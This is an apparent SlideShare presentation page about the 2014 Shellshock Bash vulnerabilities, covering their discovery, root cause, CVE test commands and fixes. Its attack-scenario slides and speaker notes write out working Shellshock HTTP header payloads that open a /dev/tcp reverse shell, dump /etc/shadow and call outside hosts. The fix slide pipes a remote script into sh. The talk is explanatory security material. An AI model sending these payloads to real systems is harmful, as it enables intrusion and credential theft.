Successfully reported this slideshow.
Your SlideShare is downloading. ×

The Shellshocker

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Loading in …3
×

Check these out next

1 of 13 Ad

The Shellshocker

Download to read offline

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

Advertisement
Advertisement

More Related Content

Slideshows for you (20)

Viewers also liked (19)

Advertisement

Recently uploaded (20)

Advertisement

The Shellshocker

  1. 1. Sharath Unni @haxorhead http://hackabab.com/shellshock/
  2. 2. DISCOVERY Stéphane Chazelas discovered the bug on 12 September 2014, told a few and publicly announced on 24th Sept CVE-2014-6271 By 25th Sept, botnets had sprung up performing DDoS. By 26th Sept, a botnet called “wopbot”, was being used DDoS attack against Akamai Technologies and to scan the US DoD.
  3. 3. BACKGROUND Affects Bash up to version 4.3 Patch 26 Analysis of the source code shows the bug existed as early as 1.13 in 1992 Each program running under Unix like OS has access to a list of env variables. These are passed to new programs started by the parent. Bash maintains a list of functions, callable only from within Bash. Bash can exec itself. Exporting env variables and func defs.
  4. 4. BACKGROUND Exported functions def begin with () in the new bash’s env var list. New bash reads the value of the env var list and converts them back to functions This conversion is done by executing code from the value, creating the func on the fly. Vulnerable versions of bash do not check if the value contains only func def Passing a func value & code will cause code to be called as well
  5. 5. CVE-2014-6271 First bug - Stéphane Chazelas env x='() { :;}; echo vulnerable' bash -c "date“ Breakdown () { :; }; - Empty environment variable declaration /bin/bash –c - Call into Bash and pass a string with a command echo vulnerable – command that ideally should not be executed
  6. 6. CVE-2014-6277 • Discovered by Michał Zalewski bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable
  7. 7. CVE-2014-7169 Third bug – Tavis Ormandy It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. env X='() { (a)=>' bash -c "echo date"; cat echo ; rm -f echo
  8. 8. UNKNOWN CVE Fourth bug env -i X=' () { }; echo hello' bash -c 'date' Demo
  9. 9. ATTACK SCENARIOS Automated Click Fraud – Blackhat SEO Accept: () { :;}; /bin/bash -c "curl http://31.41.42[.]109/search/wphp/j.php?cgi=XXX" User-Agent: () { :;}; /bin/bash -c "wget -q -O /dev/null http://ad.dipad[.]biz/test/http://XXXXXX.com/“5
  10. 10. ATTACK SCENARIOS dev/tcp reverse shell GET /cgi-bin/ HTTP/1.1 Host: x.x.x.x User-Agent: () { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/handler-ip/3333 0>&1'
  11. 11. ATTACK SCENARIOS Data theft GET /cgi-bin/status.cgi HTTP/1.0 User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)
  12. 12. FIXES Patch 27 - https://ftp.gnu.org/gnu/bash/bash-4.3-patches/ curl https://shellshocker.net/fixbash | sh
  13. 13. THANK YOU! @haxorhead http://www.hackabab.com/

Editor's Notes

  • Reference: http://www.pcworld.com/article/2687763/safe-from-shellshock-how-to-protect-your-home-computer-from-the-bash-shell-bug.html
  • env x='() { :;}; echo vulnerable' bash -c “date”
  • env x=‘bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable’
  • env X='() { (a)=>\' bash -c "echo date"; cat echo ; rm -f echo
  • Reverse shell:

    User-Agent: () { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.133.160/3333 0>&1'
  • Data theft:

    User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)
  • Data theft:

    User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)

×